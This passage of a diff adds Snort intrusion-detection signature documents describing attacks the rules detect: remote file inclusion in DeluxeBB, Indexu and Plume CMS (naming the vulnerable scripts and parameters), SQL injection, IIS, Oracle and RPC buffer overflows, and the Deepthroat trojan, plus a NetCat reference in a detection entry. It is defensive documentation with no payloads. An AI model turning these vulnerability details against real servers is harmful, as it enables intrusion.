+The host generating the request should be investigated for evidence of a compromise.  If it is determined that the system has been compromised the only safe way to recover the system is to format the system drives and re-install the system.
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matthew Watchinski <Matt.Watchinski@sourcefire.com>
+
+Additional References
+
+NetCat the Network Swiss Army Knife - http://www.atstake.com/research/tools/nc110.txt
+  
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000491.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000491
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "DeluxeBB" application running on a webserver. 
+Access to the file "posting.php" using a remote file being passed as the 
+"templatefolder" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "templatefolder" parameter in the "posting.php" script 
+used by the "DeluxeBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DeluxeBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/870.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+870
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1000.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1000
+
+--
+Summary:
+This event is generated when an attempt is made to access the bdir.htr file.
+
+--
+Impact:
+Information gathering.  This attack can disclose the directory structure on a vulnerable Internet Information Server(IIS).
+
+--
+Detailed Information:
+A vulnerability is exposed if an upgrade to IIS 4.0 is performed without deleting the remote administration scripts from IIS 3.0. Because of changes to the authentication methods between versions 3.0 and 4.0, these scripts can be accessed directly, and without authentication. An attacker can access one of these scripts, bdir.htr, to disclose the
+vulnerable server's directory structure.
+
+
+--
+Affected Systems:
+IIS 4.0 servers that are upgraded from IIS 3.0.
+
+--
+Attack Scenarios:
+An attacker can craft a URL to access the bdir.htr file, which can disclose the directory structures on the vulnerable server.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the bdir.htr file if it is not required.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2280
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000597.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000597
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_create.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_create.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000690.txt
@@ -0,0 +1,79 @@
+
+
+Rule:
+
+--
+Sid:
+100000690
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "BXCP" application running on a webserver. Access to the 
+file "index.php" with SQL commands being passed may indicate that an 
+exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "index.php" script used by the "BXCP" application 
+running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running BXCP version 0.3.0.4 and prior.
+
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Currently, no patches or workarounds exist.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Jacob <chris.jacob@sourcefire.com>
+
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+http://www.bxcp.com
+
+--
+
--- /dev/null
+++ b/doc/signatures/550.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+550
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+
+--
--- /dev/null
+++ b/doc/signatures/2586.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2586
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. 
+This may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be configured 
+to share any file on the local machine. In particular this event is
+generated when the p2p client eDonkey is used.
+
+This activity may not only use bandwidth but may also be used to transfer 
+company confidential information to unauthorized hosts external to the 
+protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using an eDonkey p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/943.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+943
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+In this case an attempt is being made to access the executable file
+fpsvradm.exe from resources external to the protected network.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/resources/documentation/office/2000/all/reskit/en-us/75t4_3.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2776.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2776
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_raw
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2849.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2849
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_an_object
+. This procedure is included in
+sys.dbms_repcat_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1768.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+
+1768 
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer in HTTP header field handler of Microsoft Internet Information Server (IIS) versions 4.0, 5.0, and 5.1.
+
+--
+Impact:
+Denial of Service, arbitrary code execution. Full administrative control is possible.
+
+--
+Detailed Information:
+A vulnerability exists in HTTP header process in ASP.DLL , a specially crafted packet sent to this processor will allow an attacker to disrupt the ISS service or run any arbitrary commands with the privileges of the ASP ISAPI extension.
+
+--
+Affected Systems:
+	Microsoft Internet Information Server 4.0 
+	Microsoft Internet Information Services 5.0 
+	Microsoft Internet Information Services 5.1 
+
+--
+Attack Scenarios:
+A remote attacker first probes the version of ISS server then ,could attempt overflow one of the HTTP header field buffers and execute arbitrary code on the system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
+
+CERT:
+http://www.cert.org/advisories/CA-2002-09.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000346.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000346
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "prepend.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "prepend.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1902.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+1902
+
+--
+Summary:
+This event is generated when a remote attacker sends an IMAP LSUB
+command with a malformed and overly long argument to an internal IMAP
+server port. This may indicate an attempt to exploit a buffer overflow
+vulnerability in the IMAP LSUB command.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When an LSUB command with an overly long argument is sent to a
+vulnerable IMAP server, a buffer overflow condition may occur. This can
+allow an attacker to execute arbitrary code from the command shell. Note
+that this exploit can only be attempted by a user with a valid IMAP account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264.
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long LSUB command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch for your current version of imapd appropriate to your
+operating system.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000631.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000631
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "review_validate_edit.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"review_validate_edit.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1983.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1983
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/461.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+461
+
+--
+
+Summary:
+This event is generated when an ICMP Type 2 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 2 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 2 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 2 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/690.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+690
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3356.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3356
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1465.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1465
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2298.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2298
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1429.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1429
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
